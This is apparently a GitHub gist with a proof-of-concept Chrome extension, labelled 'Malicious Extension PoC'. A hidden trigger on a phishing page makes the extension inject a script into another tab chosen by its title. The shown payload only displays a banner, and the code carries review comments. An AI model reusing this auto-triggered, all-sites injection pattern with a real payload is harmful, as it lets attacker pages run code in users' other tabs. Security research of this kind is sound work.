
@felmoltor
Created July 3, 2025 10:48
Dummy PoC to use extension to break restrictions from a phishing page
/**
 * Background service worker: handles runtime messages sent by the extension's
 * content script.
 *
 * Review notes:
 *  - Only `message.action` is checked; `sender` is never inspected, so every
 *    page on which the content script runs can trigger this handler.
 *  - The tab is picked purely by its title containing "Target Page"; the first
 *    match in the unfiltered tab list is used.
 *  - `executeScript` is fire-and-forget: the status reply is sent right after
 *    the call, whether or not the injection actually succeeded.
 */
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
  console.log("Background script received message:", message);

  // Anything other than the PoC action is ignored (handler returns undefined).
  if (message.action !== "inject_poc") {
    return;
  }

  // An empty query object returns every open tab.
  chrome.tabs.query({}, (openTabs) => {
    const match = openTabs.find(({ title }) => title.includes("Target Page"));

    if (!match) {
      sendResponse({ status: "Target tab not found" });
      return;
    }

    // Runs the bundled injected.js inside the matched tab.
    chrome.scripting.executeScript({
      target: { tabId: match.id },
      files: ["injected.js"],
    });
    sendResponse({ status: `Injected into tab ID ${match.id}` });
  });

  // Returning true keeps the message channel open for the asynchronous reply.
  return true;
});
// Content script: looks for the DOM markers that a cooperating page exposes.
//
// Review notes:
//  - The manifest registers this file for every URL, so it runs on each page
//    the user opens. Where no element with id "inject" exists, `btn` is null
//    and the addEventListener call below throws a TypeError.
//  - The message is only sent when the element "magic_inject_trigger" is also
//    present; its presence is the page's signal to the extension.
const btn = document.getElementById("inject");

function requestInjection() {
  // Without the marker element the click is ignored.
  if (!document.getElementById("magic_inject_trigger")) {
    return;
  }
  console.log("Injecting content into the 'Target Tab'.");
  chrome.runtime.sendMessage({ action: "inject_poc" });
}

btn.addEventListener("click", requestInjection);

// The click is synthetic: no user interaction is needed to fire the handler.
btn.click();
console.log("Content script loaded and button clicked.");
// Payload executed inside the matched tab. In this PoC it is purely visual:
// it pins a red banner to the top-left corner of the page to show that code
// from the extension ran in another tab's document.
(function showInjectionBanner() {
  const banner = document.createElement("h1");
  banner.innerText = "Hello from the malicious extension!";

  // Fixed position plus a high z-index keeps the banner above page content.
  Object.assign(banner.style, {
    color: "white",
    background: "red",
    padding: "10px",
    position: "fixed",
    top: "0",
    left: "0",
    zIndex: "9999",
  });

  document.body.prepend(banner);
  console.log("Injected script executed");
})();
{
"manifest_version": 3,
"name": "Malicious Extension PoC",
"version": "1.0",
"description": "PoC extension that modifies other tabs",
"permissions": [
"tabs",
"scripting"
],
"host_permissions": [
"<all_urls>"
],
"background": {
"service_worker": "background.js"
},
"action": {
"default_popup": "poc.html"
},
"web_accessible_resources": [
{
"resources": ["content.js","injected.js"],
"matches": ["<all_urls>"]
}
],
"content_scripts": [
{
"matches": ["<all_urls>"],
"js": ["content.js"],
"run_at": "document_idle"
}
]
}
<!DOCTYPE html>
<html>
<head>
<title>Phishing Page</title>
</head>
<body>
<!-- just an innocent-looking page that includes the trigger -->
<!-- Both elements below are hidden (display: none) and carry no visible content.
     content.js looks them up by id: it attaches a click handler to #inject and
     only messages the background script when #magic_inject_trigger is present. -->
<div id="magic_inject_trigger" style="display: none"></div>
<button id="inject" style="display: none"></button>
<h1>Phishing Page</h1>
<img src="imin.png" width="150px"></img>
</body>
</html>
<html>
<head>
<!-- background.js picks the tab to inject into by checking whether the tab title
     contains "Target Page"; this title is what makes the page a match. -->
<title>Target Page</title>
</head>
<body>
<h1>Target Page</h1>
<p>This is the target page where the script will be injected.</p>
</body>
</html>